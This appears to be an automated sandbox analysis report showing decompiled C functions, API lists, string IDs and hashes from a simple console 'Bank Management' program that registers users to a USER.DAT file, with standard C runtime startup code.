                                              Function 00D82560, Relevance: 31.7, APIs: 9, Strings: 9, Instructions: 155COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 80%
                                              			E00D82560(void* __ebx, void* __edi, void* __esi, void* __fp0) {
				char _v8;
				char _v12;
				char _v15;
				char _v19;
				char _v23;
				char _v27;
				char _v31;
				char _v35;
				char _v39;
				char _v43;
				char _v44;
				char _v47;
				char _v51;
				char _v55;
				char _v59;
				char _v63;
				char _v67;
				char _v71;
				char _v75;
				char _v76;
				char _v108;
				char _v140;
				void* __ebp;
				intOrPtr _t42;
				void* _t44;
				intOrPtr _t53;
				intOrPtr _t58;
				intOrPtr _t67;
				void* _t70;
				void* _t73;
				intOrPtr _t75;
				intOrPtr _t76;
				intOrPtr _t79;
				void* _t83;
				void* _t84;
				void* _t85;
				void* _t88;
				void* _t89;
				void* _t90;
				void* _t103;

				_t103 = __fp0;
				_t84 = __esi;
				_t83 = __edi;
				_t73 = __ebx;
				_v8 = 0;
				_v12 = 0;
				_v76 = 0;
				_v75 = 0;
				_v71 = 0;
				_v67 = 0;
				_v63 = 0;
				_v59 = 0;
				_v55 = 0;
				_v51 = 0;
				_v47 = 0;
				_v44 = 0;
				_t74 = 0;
				_v43 = 0;
				_v39 = 0;
				_v35 = 0;
				_v31 = 0;
				_v27 = 0;
				_v23 = 0;
				_v19 = 0;
				_v15 = 0;
				do {
					E00D82080(_t74, _t83, _t84, 0, _t103);
					_v8 = 0;
					E00D81250(0x19, 8);
					_push("User Name        : ");
					E00D870FC(_t73, _t83, _t84, 0);
					E00D8732B("%s", 0xda2ee4);
					_t42 = E00D86E91("USER.DAT", "r");
					_t88 = _t85 + 0x14;
					 *0xda2f28 = _t42;
					_v12 = 0;
					while(1) {
						_push( &_v140);
						_push( &_v108);
						_t75 =  *0xda2f28; // 0x0
						_t44 = E00D86FC1(_t75, "%s %s %s\n", 0xda2ee0);
						_t89 = _t88 + 0x14;
						if(_t44 == 0xffffffff) {
							goto L6;
						}
						_t70 = E00D881D0( &_v108, 0xda2ee4);
						_t88 = _t89 + 8;
						if(_t70 == 0) {
							_v12 = _v12 + 1;
						}
					}
					L6:
					_t74 =  *0xda2f28; // 0x0
					_push(_t74);
					E00D86D56(_t73, _t83, _t84, __eflags);
					_t90 = _t89 + 4;
					__eflags = _v12;
					if(__eflags == 0) {
						E00D81250(0x19, 0xa);
						_push("Password         : ");
						E00D870FC(_t73, _t83, _t84, __eflags);
						E00D81290(_t83, _t84,  &_v76);
						E00D81250(0x19, 0xc);
						_push("Confirm Password : ");
						E00D870FC(_t73, _t83, _t84, __eflags);
						_t74 =  &_v44;
						E00D81290(_t83, _t84,  &_v44);
						_t53 = E00D881D0(0xda2f02,  &_v44);
						_t85 = _t90 + 0x10;
						__eflags = _t53;
						if(__eflags != 0) {
							E00D82080( &_v44, _t83, _t84, __eflags, _t103);
							E00D81250(0xa, 0xa);
							_push(0xd9f444);
							E00D870FC(_t73, _t83, _t84, __eflags);
							_t85 = _t85 + 4;
							_t67 = _v8 + 1;
							__eflags = _t67;
							_v8 = _t67;
						}
					} else {
						E00D81250(0xa, 0xa);
						_push(0xd9f3e0);
						E00D870FC(_t73, _t83, _t84, __eflags);
						_t85 = _t90 + 4;
						_v8 = _v8 + 1;
					}
					__eflags = _v8;
				} while (__eflags != 0);
				 *0xda2f28 = E00D86E91("USER.DAT", 0xd9f474);
				_t76 =  *0xda2f28; // 0x0
				_push(_t76);
				E00D86D56(_t73, _t83, _t84, __eflags);
				 *0xda2f28 = E00D86E91("USER.DAT", "a");
				_push(0xda2f02);
				_push(0xda2ee4);
				_push(0xda2ee0);
				_push("%s %s %s\n");
				_t79 =  *0xda2f28; // 0x0
				_push(_t79);
				E00D86EA6(_t73, _t83, _t84, __eflags);
				_t58 =  *0xda2f28; // 0x0
				_push(_t58);
				E00D86D56(_t73, _t83, _t84, __eflags);
				E00D82080(_t76, _t83, _t84, __eflags, _t103);
				E00D81250(0x19, 0xa);
				_push("Record ADDED successfully!");
				return E00D870FC(_t73, _t83, _t84, __eflags);
			}











































                                              0x00d82560
                                              0x00d82560
                                              0x00d82560
                                              0x00d82560
                                              0x00d82569
                                              0x00d82570
                                              0x00d82577
                                              0x00d8257d
                                              0x00d82580
                                              0x00d82583
                                              0x00d82586
                                              0x00d82589
                                              0x00d8258c
                                              0x00d8258f
                                              0x00d82592
                                              0x00d82595
                                              0x00d82599
                                              0x00d8259b
                                              0x00d8259e
                                              0x00d825a1
                                              0x00d825a4
                                              0x00d825a7
                                              0x00d825aa
                                              0x00d825ad
                                              0x00d825b0
                                              0x00d825b3
                                              0x00d825b3
                                              0x00d825b8
                                              0x00d825c3
                                              0x00d825c8
                                              0x00d825cd
                                              0x00d825df
                                              0x00d825f1
                                              0x00d825f6
                                              0x00d825f9
                                              0x00d825fe
                                              0x00d82605
                                              0x00d8260b
                                              0x00d8260f
                                              0x00d8261a
                                              0x00d82621
                                              0x00d82626
                                              0x00d8262c
                                              0x00000000
                                              0x00000000
                                              0x00d82637
                                              0x00d8263c
                                              0x00d82641
                                              0x00d82649
                                              0x00d82649
                                              0x00d8264c
                                              0x00d8264e
                                              0x00d8264e
                                              0x00d82654
                                              0x00d82655
                                              0x00d8265a
                                              0x00d8265d
                                              0x00d82661
                                              0x00d82688
                                              0x00d8268d
                                              0x00d82692
                                              0x00d8269e
                                              0x00d826a7
                                              0x00d826ac
                                              0x00d826b1
                                              0x00d826b9
                                              0x00d826bd
                                              0x00d826cb
                                              0x00d826d0
                                              0x00d826d3
                                              0x00d826d5
                                              0x00d826d7
                                              0x00d826e0
                                              0x00d826e5
                                              0x00d826ea
                                              0x00d826ef
                                              0x00d826f5
                                              0x00d826f5
                                              0x00d826f8
                                              0x00d826f8
                                              0x00d82663
                                              0x00d82667
                                              0x00d8266c
                                              0x00d82671
                                              0x00d82676
                                              0x00d8267f
                                              0x00d8267f
                                              0x00d826fb
                                              0x00d826fb
                                              0x00d82717
                                              0x00d8271c
                                              0x00d82722
                                              0x00d82723
                                              0x00d8273d
                                              0x00d82742
                                              0x00d82747
                                              0x00d8274c
                                              0x00d82751
                                              0x00d82756
                                              0x00d8275c
                                              0x00d8275d
                                              0x00d82765
                                              0x00d8276a
                                              0x00d8276b
                                              0x00d82773
                                              0x00d8277c
                                              0x00d82781
                                              0x00d82791

                                              APIs
                                                • Part of subcall function 00D82080: _wprintf.LIBCMT ref: 00D8209F
                                                • Part of subcall function 00D82080: _wprintf.LIBCMT ref: 00D820DE
                                                • Part of subcall function 00D82080: _wprintf.LIBCMT ref: 00D820FF
                                                • Part of subcall function 00D82080: __wstrtime.LIBCMT ref: 00D8210C
                                                • Part of subcall function 00D82080: _wprintf.LIBCMT ref: 00D82128
                                                • Part of subcall function 00D82080: __wstrtime.LIBCMT ref: 00D82135
                                                • Part of subcall function 00D82080: _wprintf.LIBCMT ref: 00D82168
                                                • Part of subcall function 00D81250: GetStdHandle.KERNEL32(000000F5,00000000,?,00D81333,?,?,?,00D811CF), ref: 00D81271
                                                • Part of subcall function 00D81250: SetConsoleCursorPosition.KERNEL32(00000000,?,00D81333,?,?,?,00D811CF), ref: 00D81278
                                              • _wprintf.LIBCMT ref: 00D825CD
                                              • _wscanf.LIBCMT ref: 00D825DF
                                                • Part of subcall function 00D8732B: _vwscanf.LIBCMT ref: 00D8733C
                                                • Part of subcall function 00D86E91: __fsopen.LIBCMT ref: 00D86E9C
                                              • _swscanf.LIBCMT ref: 00D82621
                                                • Part of subcall function 00D86FC1: _vfscanf.LIBCMT ref: 00D86FD5
                                              • _wprintf.LIBCMT ref: 00D82671
                                              • _wprintf.LIBCMT ref: 00D82692
                                              • _wprintf.LIBCMT ref: 00D826B1
                                              • _wprintf.LIBCMT ref: 00D826EA
                                              • _fprintf.LIBCMT ref: 00D8275D
                                              • _wprintf.LIBCMT ref: 00D82786
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.382981299.0000000000D81000.00000020.00020000.sdmp, Offset: 00D80000, based on PE: true
                                              • Associated: 00000002.00000002.382951504.0000000000D80000.00000002.00020000.sdmp Download File
                                              • Associated: 00000002.00000002.383023162.0000000000D98000.00000002.00020000.sdmp Download File
                                              • Associated: 00000002.00000002.383040167.0000000000D9F000.00000008.00020000.sdmp Download File
                                              • Associated: 00000002.00000002.383052051.0000000000DA5000.00000002.00020000.sdmp Download File
                                              Similarity
                                              • API ID: _wprintf$__wstrtime$ConsoleCursorHandlePosition__fsopen_fprintf_swscanf_vfscanf_vwscanf_wscanf
                                              • String ID: %s %s %s$%s %s %s$Confirm Password : $Password : $Record ADDED successfully!$USER.DAT$USER.DAT$USER.DAT$User Name :
                                              • API String ID: 3917209068-3252730458
                                              • Opcode ID: a80a7cc3cf4f6f93fe5fbf4c2359ec180dfbf4afafdbb8ad986bcb4b82fab461
                                              • Instruction ID: 968a08746fc4706366cb337ad2b33df010d00c9396a1bed3fc0f5f8575541580
                                              • Opcode Fuzzy Hash: a80a7cc3cf4f6f93fe5fbf4c2359ec180dfbf4afafdbb8ad986bcb4b82fab461
                                              • Instruction Fuzzy Hash: 4F512CB1E40308AEDB00FBA9DC43BAE76B4EF15714F144029F904F6281EAB19658877A
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00D82180, Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 77COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 73%
                                              			E00D82180(void* __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _v8;
				void* __ebp;
				void* _t28;
				intOrPtr _t31;
				void* _t34;
				void* _t35;
				void* _t36;

				_t33 = __esi;
				_t32 = __edi;
				E00D81320(__edi, __esi, __eflags, 0, 0, 0x50, 0x17);
				E00D81250(0x1b, 4);
				_push("BANK MANAGEMENT //");
				E00D870FC(_t28, __edi, __esi, __eflags);
				_t35 = _t34 + 4;
				E00D81250(0x19, 5);
				_v8 = 0;
				while(1) {
					_t42 = _v8 - 0x1b;
					if(_v8 >= 0x1b) {
						break;
					}
					_push(0xc4);
					_push("%c");
					E00D870FC(_t28, _t32, _t33, _t42);
					_t35 = _t35 + 8;
					_v8 = _v8 + 1;
				}
				E00D81250(0x19, 8);
				_push("Designed and Programmed by:");
				E00D870FC(_t28, _t32, _t33, __eflags);
				_t36 = _t35 + 4;
				E00D81250(0x19, 9);
				_v8 = 0;
				while(1) {
					__eflags = _v8 - 0x1b;
					if(__eflags >= 0) {
						break;
					}
					_push(0xc4);
					_push("%c");
					E00D870FC(_t28, _t32, _t33, __eflags);
					_t36 = _t36 + 8;
					_t31 = _v8 + 1;
					__eflags = _t31;
					_v8 = _t31;
				}
				E00D81250(0x21, 0xb);
				_push("Ravi Agrawal");
				E00D870FC(_t28, _t32, _t33, __eflags);
				E00D81250(0x21, 0xd);
				_push("Sagar Sharma");
				E00D870FC(_t28, _t32, _t33, __eflags);
				E00D81250(0x21, 0xf);
				_push("Sawal Maskey");
				E00D870FC(_t28, _t32, _t33, __eflags);
				E00D81250(0x18, 0x14);
				_push("Press Any key to continue...");
				return E00D870FC(_t28, _t32, _t33, __eflags);
			}










                                              0x00d82180
                                              0x00d82180
                                              0x00d8218c
                                              0x00d82195
                                              0x00d8219a
                                              0x00d8219f
                                              0x00d821a4
                                              0x00d821ab
                                              0x00d821b0
                                              0x00d821c2
                                              0x00d821c2
                                              0x00d821c6
                                              0x00000000
                                              0x00000000
                                              0x00d821c8
                                              0x00d821cd
                                              0x00d821d2
                                              0x00d821d7
                                              0x00d821bf
                                              0x00d821bf
                                              0x00d821e0
                                              0x00d821e5
                                              0x00d821ea
                                              0x00d821ef
                                              0x00d821f6
                                              0x00d821fb
                                              0x00d8220d
                                              0x00d8220d
                                              0x00d82211
                                              0x00000000
                                              0x00000000
                                              0x00d82213
                                              0x00d82218
                                              0x00d8221d
                                              0x00d82222
                                              0x00d82207
                                              0x00d82207
                                              0x00d8220a
                                              0x00d8220a
                                              0x00d8222b
                                              0x00d82230
                                              0x00d82235
                                              0x00d82241
                                              0x00d82246
                                              0x00d8224b
                                              0x00d82257
                                              0x00d8225c
                                              0x00d82261
                                              0x00d8226d
                                              0x00d82272
                                              0x00d82282

                                              APIs
                                                • Part of subcall function 00D81320: _wprintf.LIBCMT ref: 00D8133D
                                                • Part of subcall function 00D81320: _wprintf.LIBCMT ref: 00D8137B
                                                • Part of subcall function 00D81320: _wprintf.LIBCMT ref: 00D8139C
                                                • Part of subcall function 00D81320: _wprintf.LIBCMT ref: 00D81410
                                                • Part of subcall function 00D81320: _wprintf.LIBCMT ref: 00D81433
                                                • Part of subcall function 00D81250: GetStdHandle.KERNEL32(000000F5,00000000,?,00D81333,?,?,?,00D811CF), ref: 00D81271
                                                • Part of subcall function 00D81250: SetConsoleCursorPosition.KERNEL32(00000000,?,00D81333,?,?,?,00D811CF), ref: 00D81278
                                              • _wprintf.LIBCMT ref: 00D8219F
                                              • _wprintf.LIBCMT ref: 00D821D2
                                                • Part of subcall function 00D870FC: __stbuf.LIBCMT ref: 00D87148
                                                • Part of subcall function 00D870FC: __output_s_l.LIBCMT ref: 00D87162
                                                • Part of subcall function 00D870FC: __ftbuf.LIBCMT ref: 00D87176
                                              • _wprintf.LIBCMT ref: 00D821EA
                                              • _wprintf.LIBCMT ref: 00D8221D
                                              • _wprintf.LIBCMT ref: 00D82235
                                              • _wprintf.LIBCMT ref: 00D8224B
                                              • _wprintf.LIBCMT ref: 00D82261
                                              • _wprintf.LIBCMT ref: 00D82277
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.382981299.0000000000D81000.00000020.00020000.sdmp, Offset: 00D80000, based on PE: true
                                              • Associated: 00000002.00000002.382951504.0000000000D80000.00000002.00020000.sdmp Download File
                                              • Associated: 00000002.00000002.383023162.0000000000D98000.00000002.00020000.sdmp Download File
                                              • Associated: 00000002.00000002.383040167.0000000000D9F000.00000008.00020000.sdmp Download File
                                              • Associated: 00000002.00000002.383052051.0000000000DA5000.00000002.00020000.sdmp Download File
                                              Similarity
                                              • API ID: _wprintf$ConsoleCursorHandlePosition__ftbuf__output_s_l__stbuf
                                              • String ID: BANK MANAGEMENT //$Designed and Programmed by:$Press Any key to continue...$Ravi Agrawal$Sagar Sharma$Sawal Maskey
                                              • API String ID: 1778593935-2888666035
                                              • Opcode ID: d1afb519cc5981c86416fe08bab6ad99f2282f1645cbff36a6b9115f071dbe3f
                                              • Instruction ID: e2c40c5e3c0951eb99115c09995d63bed5335a23b91826580866a6af99661def
                                              • Opcode Fuzzy Hash: d1afb519cc5981c86416fe08bab6ad99f2282f1645cbff36a6b9115f071dbe3f
                                              • Instruction Fuzzy Hash: E121C4B4FC4304FAEA50B7A45C07BAE2224DB50F68F240020F7457A1C2E9E1A65967BB
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00D82080, Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 67COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 66%
                                              			E00D82080(void* __ecx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
				intOrPtr _v8;
				void* __ebp;
				void* _t9;
				intOrPtr _t16;
				void* _t20;
				void* _t24;
				void* _t26;
				void* _t27;
				void* _t31;
				void* _t37;

				_t37 = __fp0;
				_t23 = __esi;
				_t22 = __edi;
				E00D81320(__edi, __esi, __eflags, 0, 0, 0x50, 0x17);
				E00D81250(0x19, 1);
				_push("Banking Management //");
				E00D870FC(_t20, __edi, __esi, __eflags);
				E00D81250(5, 3);
				_t9 = E00D881D0(0xda2ee4, "Admin");
				_t26 = _t24 + 0xc;
				if(_t9 == 0) {
					 *0xda2240 = 1;
				}
				_t34 =  *0xda2240;
				if( *0xda2240 == 0) {
					_push(0xda2ee4);
					_push("Current User : %s");
					E00D870FC(_t20, _t22, _t23, __eflags);
					_t27 = _t26 + 8;
				} else {
					_push("Current User : Admin");
					E00D870FC(_t20, _t22, _t23, _t34);
					_t27 = _t26 + 4;
				}
				_push("\t\t\t\tDate : ");
				E00D870FC(_t20, _t22, _t23, _t34);
				E00D882EB(_t34, 0xda2f40);
				_push(0xda2f40);
				E00D81640(_t22, _t23, _t37);
				_push(0xda2f40);
				_push("%s");
				E00D870FC(_t20, _t22, _t23, _t34);
				E00D882EB(_t34, 0xda2f40);
				_t31 = _t27 + 0x14;
				_t16 = E00D81250(1, 5);
				_v8 = 0;
				while(1) {
					_t35 = _v8 - 0x4e;
					if(_v8 >= 0x4e) {
						break;
					}
					_push(0xc4);
					_push("%c");
					E00D870FC(_t20, _t22, _t23, _t35);
					_t31 = _t31 + 8;
					_t16 = _v8 + 1;
					_v8 = _t16;
				}
				return _t16;
			}













                                              0x00d82080
                                              0x00d82080
                                              0x00d82080
                                              0x00d8208c
                                              0x00d82095
                                              0x00d8209a
                                              0x00d8209f
                                              0x00d820ab
                                              0x00d820ba
                                              0x00d820bf
                                              0x00d820c4
                                              0x00d820c6
                                              0x00d820c6
                                              0x00d820d0
                                              0x00d820d7
                                              0x00d820e8
                                              0x00d820ed
                                              0x00d820f2
                                              0x00d820f7
                                              0x00d820d9
                                              0x00d820d9
                                              0x00d820de
                                              0x00d820e3
                                              0x00d820e3
                                              0x00d820fa
                                              0x00d820ff
                                              0x00d8210c
                                              0x00d82114
                                              0x00d82119
                                              0x00d8211e
                                              0x00d82123
                                              0x00d82128
                                              0x00d82135
                                              0x00d8213a
                                              0x00d82141
                                              0x00d82146
                                              0x00d82158
                                              0x00d82158
                                              0x00d8215c
                                              0x00000000
                                              0x00000000
                                              0x00d8215e
                                              0x00d82163
                                              0x00d82168
                                              0x00d8216d
                                              0x00d82152
                                              0x00d82155
                                              0x00d82155
                                              0x00d82175

                                              APIs
                                                • Part of subcall function 00D81320: _wprintf.LIBCMT ref: 00D8133D
                                                • Part of subcall function 00D81320: _wprintf.LIBCMT ref: 00D8137B
                                                • Part of subcall function 00D81320: _wprintf.LIBCMT ref: 00D8139C
                                                • Part of subcall function 00D81320: _wprintf.LIBCMT ref: 00D81410
                                                • Part of subcall function 00D81320: _wprintf.LIBCMT ref: 00D81433
                                                • Part of subcall function 00D81250: GetStdHandle.KERNEL32(000000F5,00000000,?,00D81333,?,?,?,00D811CF), ref: 00D81271
                                                • Part of subcall function 00D81250: SetConsoleCursorPosition.KERNEL32(00000000,?,00D81333,?,?,?,00D811CF), ref: 00D81278
                                              • _wprintf.LIBCMT ref: 00D8209F
                                              • _wprintf.LIBCMT ref: 00D820DE
                                              • _wprintf.LIBCMT ref: 00D820F2
                                                • Part of subcall function 00D870FC: __stbuf.LIBCMT ref: 00D87148
                                                • Part of subcall function 00D870FC: __output_s_l.LIBCMT ref: 00D87162
                                                • Part of subcall function 00D870FC: __ftbuf.LIBCMT ref: 00D87176
                                              • _wprintf.LIBCMT ref: 00D820FF
                                              • __wstrtime.LIBCMT ref: 00D8210C
                                              • _wprintf.LIBCMT ref: 00D82128
                                              • __wstrtime.LIBCMT ref: 00D82135
                                              • _wprintf.LIBCMT ref: 00D82168
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.382981299.0000000000D81000.00000020.00020000.sdmp, Offset: 00D80000, based on PE: true
                                              • Associated: 00000002.00000002.382951504.0000000000D80000.00000002.00020000.sdmp Download File
                                              • Associated: 00000002.00000002.383023162.0000000000D98000.00000002.00020000.sdmp Download File
                                              • Associated: 00000002.00000002.383040167.0000000000D9F000.00000008.00020000.sdmp Download File
                                              • Associated: 00000002.00000002.383052051.0000000000DA5000.00000002.00020000.sdmp Download File
                                              Similarity
                                              • API ID: _wprintf$__wstrtime$ConsoleCursorHandlePosition__ftbuf__output_s_l__stbuf
                                              • String ID: Date : $Admin$Banking Management //$Current User : %s$Current User : Admin$N
                                              • API String ID: 3817360410-644830535
                                              • Opcode ID: d24c37e82d4df1544ed9e58115092b7701f6351b27fc458f1e63f8e201fed812
                                              • Instruction ID: dda950efef12e9e26d2faaf1e24c038399828123e091f87c7bac84d5367b7873
                                              • Opcode Fuzzy Hash: d24c37e82d4df1544ed9e58115092b7701f6351b27fc458f1e63f8e201fed812
                                              • Instruction Fuzzy Hash: 001148B0EC4304BEE11073A65C07FAE3564DB22F1AF240064FA49352C2E9E2A65C537F
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00D8A582, Relevance: 16.7, APIs: 11, Instructions: 229COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 86%
                                              			E00D8A582(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int _t81;
				void* _t86;
				long _t90;
				signed int _t94;
				signed int _t98;
				signed int _t99;
				signed char _t103;
				signed int _t105;
				intOrPtr _t106;
				intOrPtr* _t109;
				signed char _t111;
				long _t119;
				signed int _t130;
				signed int _t134;
				signed int _t135;
				signed int _t138;
				void** _t139;
				signed int _t141;
				void* _t142;
				signed int _t143;
				void** _t147;
				signed int _t149;
				void* _t150;
				signed int _t154;
				void* _t155;
				void* _t160;

				_push(0x64);
				_push(0xd9d8c0);
				E00D89100(__ebx, __edi, __esi);
				E00D8BDFF(0xb);
				_t130 = 0;
				 *(_t155 - 4) = 0;
				_t160 =  *0xda2f60 - _t130; // 0x0
				if(_t160 == 0) {
					_push(0x40);
					_t141 = 0x20;
					_push(_t141);
					_t81 = E00D8C4FB();
					_t134 = _t81;
					 *(_t155 - 0x24) = _t134;
					__eflags = _t134;
					if(_t134 != 0) {
						 *0xda2f60 = _t81;
						 *0xda2f5c = _t141;
						while(1) {
							__eflags = _t134 - _t81 + 0x800;
							if(_t134 >= _t81 + 0x800) {
								break;
							}
							 *((short*)(_t134 + 4)) = 0xa00;
							 *_t134 =  *_t134 | 0xffffffff;
							 *(_t134 + 8) = _t130;
							 *(_t134 + 0x24) =  *(_t134 + 0x24) & 0x00000080;
							 *(_t134 + 0x24) =  *(_t134 + 0x24) & 0x0000007f;
							 *((short*)(_t134 + 0x25)) = 0xa0a;
							 *(_t134 + 0x38) = _t130;
							 *(_t134 + 0x34) = _t130;
							_t134 = _t134 + 0x40;
							 *(_t155 - 0x24) = _t134;
							_t81 =  *0xda2f60; // 0x0
						}
						GetStartupInfoW(_t155 - 0x74);
						__eflags =  *((short*)(_t155 - 0x42));
						if( *((short*)(_t155 - 0x42)) == 0) {
							while(1) {
								L31:
								 *(_t155 - 0x2c) = _t130;
								__eflags = _t130 - 3;
								if(_t130 >= 3) {
									break;
								}
								_t147 = (_t130 << 6) +  *0xda2f60;
								 *(_t155 - 0x24) = _t147;
								__eflags =  *_t147 - 0xffffffff;
								if( *_t147 == 0xffffffff) {
									L35:
									_t147[1] = 0x81;
									__eflags = _t130;
									if(_t130 != 0) {
										_t66 = _t130 - 1; // -1
										asm("sbb eax, eax");
										_t90 =  ~_t66 + 0xfffffff5;
										__eflags = _t90;
									} else {
										_t90 = 0xfffffff6;
									}
									_t142 = GetStdHandle(_t90);
									__eflags = _t142 - 0xffffffff;
									if(_t142 == 0xffffffff) {
										L47:
										_t147[1] = _t147[1] | 0x00000040;
										 *_t147 = 0xfffffffe;
										_t94 =  *0xda3064;
										__eflags = _t94;
										if(_t94 != 0) {
											 *( *((intOrPtr*)(_t94 + _t130 * 4)) + 0x10) = 0xfffffffe;
										}
										goto L49;
									} else {
										__eflags = _t142;
										if(_t142 == 0) {
											goto L47;
										}
										_t98 = GetFileType(_t142);
										__eflags = _t98;
										if(_t98 == 0) {
											goto L47;
										}
										 *_t147 = _t142;
										_t99 = _t98 & 0x000000ff;
										__eflags = _t99 - 2;
										if(_t99 != 2) {
											__eflags = _t99 - 3;
											if(_t99 != 3) {
												L46:
												_t70 =  &(_t147[3]); // -14298964
												InitializeCriticalSectionAndSpinCount(_t70, 0xfa0);
												_t147[2] = _t147[2] + 1;
												L49:
												_t130 = _t130 + 1;
												continue;
											}
											_t103 = _t147[1] | 0x00000008;
											__eflags = _t103;
											L45:
											_t147[1] = _t103;
											goto L46;
										}
										_t103 = _t147[1] | 0x00000040;
										goto L45;
									}
								}
								__eflags =  *_t147 - 0xfffffffe;
								if( *_t147 == 0xfffffffe) {
									goto L35;
								}
								_t147[1] = _t147[1] | 0x00000080;
								goto L49;
							}
							 *(_t155 - 4) = 0xfffffffe;
							E00D8A846();
							L2:
							_t86 = 1;
							L3:
							return E00D89145(_t86);
						}
						_t105 =  *(_t155 - 0x40);
						__eflags = _t105;
						if(_t105 == 0) {
							goto L31;
						}
						_t135 =  *_t105;
						 *(_t155 - 0x1c) = _t135;
						_t106 = _t105 + 4;
						 *((intOrPtr*)(_t155 - 0x28)) = _t106;
						 *(_t155 - 0x20) = _t106 + _t135;
						__eflags = _t135 - 0x800;
						if(_t135 >= 0x800) {
							_t135 = 0x800;
							 *(_t155 - 0x1c) = 0x800;
						}
						_t149 = 1;
						__eflags = 1;
						 *(_t155 - 0x30) = 1;
						while(1) {
							__eflags =  *0xda2f5c - _t135; // 0x0
							if(__eflags >= 0) {
								break;
							}
							_t138 = E00D8C4FB(_t141, 0x40);
							 *(_t155 - 0x24) = _t138;
							__eflags = _t138;
							if(_t138 != 0) {
								0xda2f60[_t149] = _t138;
								 *0xda2f5c =  *0xda2f5c + _t141;
								__eflags =  *0xda2f5c;
								while(1) {
									__eflags = _t138 - 0xda2f60[_t149] + 0x800;
									if(_t138 >= 0xda2f60[_t149] + 0x800) {
										break;
									}
									 *((short*)(_t138 + 4)) = 0xa00;
									 *_t138 =  *_t138 | 0xffffffff;
									 *(_t138 + 8) = _t130;
									 *(_t138 + 0x24) =  *(_t138 + 0x24) & 0x00000080;
									 *((short*)(_t138 + 0x25)) = 0xa0a;
									 *(_t138 + 0x38) = _t130;
									 *(_t138 + 0x34) = _t130;
									_t138 = _t138 + 0x40;
									 *(_t155 - 0x24) = _t138;
								}
								_t149 = _t149 + 1;
								 *(_t155 - 0x30) = _t149;
								_t135 =  *(_t155 - 0x1c);
								continue;
							}
							_t135 =  *0xda2f5c; // 0x0
							 *(_t155 - 0x1c) = _t135;
							break;
						}
						_t143 = _t130;
						 *(_t155 - 0x2c) = _t143;
						_t109 =  *((intOrPtr*)(_t155 - 0x28));
						_t139 =  *(_t155 - 0x20);
						while(1) {
							__eflags = _t143 - _t135;
							if(_t143 >= _t135) {
								goto L31;
							}
							_t150 =  *_t139;
							__eflags = _t150 - 0xffffffff;
							if(_t150 == 0xffffffff) {
								L26:
								_t143 = _t143 + 1;
								 *(_t155 - 0x2c) = _t143;
								_t109 =  *((intOrPtr*)(_t155 - 0x28)) + 1;
								 *((intOrPtr*)(_t155 - 0x28)) = _t109;
								_t139 =  &(_t139[1]);
								 *(_t155 - 0x20) = _t139;
								continue;
							}
							__eflags = _t150 - 0xfffffffe;
							if(_t150 == 0xfffffffe) {
								goto L26;
							}
							_t111 =  *_t109;
							__eflags = _t111 & 0x00000001;
							if((_t111 & 0x00000001) == 0) {
								goto L26;
							}
							__eflags = _t111 & 0x00000008;
							if((_t111 & 0x00000008) != 0) {
								L24:
								_t154 = ((_t143 & 0x0000001f) << 6) + 0xda2f60[_t143 >> 5];
								 *(_t155 - 0x24) = _t154;
								 *_t154 =  *_t139;
								 *((char*)(_t154 + 4)) =  *((intOrPtr*)( *((intOrPtr*)(_t155 - 0x28))));
								_t38 = _t154 + 0xc; // 0xd
								InitializeCriticalSectionAndSpinCount(_t38, 0xfa0);
								_t39 = _t154 + 8;
								 *_t39 =  *(_t154 + 8) + 1;
								__eflags =  *_t39;
								_t139 =  *(_t155 - 0x20);
								L25:
								_t135 =  *(_t155 - 0x1c);
								goto L26;
							}
							_t119 = GetFileType(_t150);
							_t139 =  *(_t155 - 0x20);
							__eflags = _t119;
							if(_t119 == 0) {
								goto L25;
							}
							goto L24;
						}
						goto L31;
					}
					E00D89690(_t155, 0xda1380, _t155 - 0x10, 0xfffffffe);
					_t86 = 0;
					goto L3;
				}
				E00D89690(_t155, 0xda1380, _t155 - 0x10, 0xfffffffe);
				goto L2;
			}





























                                              0x00d8a582
                                              0x00d8a584
                                              0x00d8a589
                                              0x00d8a590
                                              0x00d8a596
                                              0x00d8a598
                                              0x00d8a59b
                                              0x00d8a5a1
                                              0x00d8a5c1
                                              0x00d8a5c5
                                              0x00d8a5c6
                                              0x00d8a5c7
                                              0x00d8a5ce
                                              0x00d8a5d0
                                              0x00d8a5d3
                                              0x00d8a5d5
                                              0x00d8a5ee
                                              0x00d8a5f3
                                              0x00d8a5f9
                                              0x00d8a5fe
                                              0x00d8a600
                                              0x00000000
                                              0x00000000
                                              0x00d8a602
                                              0x00d8a608
                                              0x00d8a60b
                                              0x00d8a60e
                                              0x00d8a617
                                              0x00d8a61a
                                              0x00d8a620
                                              0x00d8a623
                                              0x00d8a626
                                              0x00d8a629
                                              0x00d8a62c
                                              0x00d8a62c
                                              0x00d8a637
                                              0x00d8a63d
                                              0x00d8a642
                                              0x00d8a771
                                              0x00d8a771
                                              0x00d8a771
                                              0x00d8a774
                                              0x00d8a777
                                              0x00000000
                                              0x00000000
                                              0x00d8a782
                                              0x00d8a788
                                              0x00d8a78b
                                              0x00d8a78e
                                              0x00d8a7a3
                                              0x00d8a7a3
                                              0x00d8a7a7
                                              0x00d8a7a9
                                              0x00d8a7b0
                                              0x00d8a7b5
                                              0x00d8a7b7
                                              0x00d8a7b7
                                              0x00d8a7ab
                                              0x00d8a7ad
                                              0x00d8a7ad
                                              0x00d8a7c1
                                              0x00d8a7c3
                                              0x00d8a7c6
                                              0x00d8a80d
                                              0x00d8a813
                                              0x00d8a816
                                              0x00d8a81c
                                              0x00d8a821
                                              0x00d8a823
                                              0x00d8a828
                                              0x00d8a828
                                              0x00000000
                                              0x00d8a7c8
                                              0x00d8a7c8
                                              0x00d8a7ca
                                              0x00000000
                                              0x00000000
                                              0x00d8a7cd
                                              0x00d8a7d3
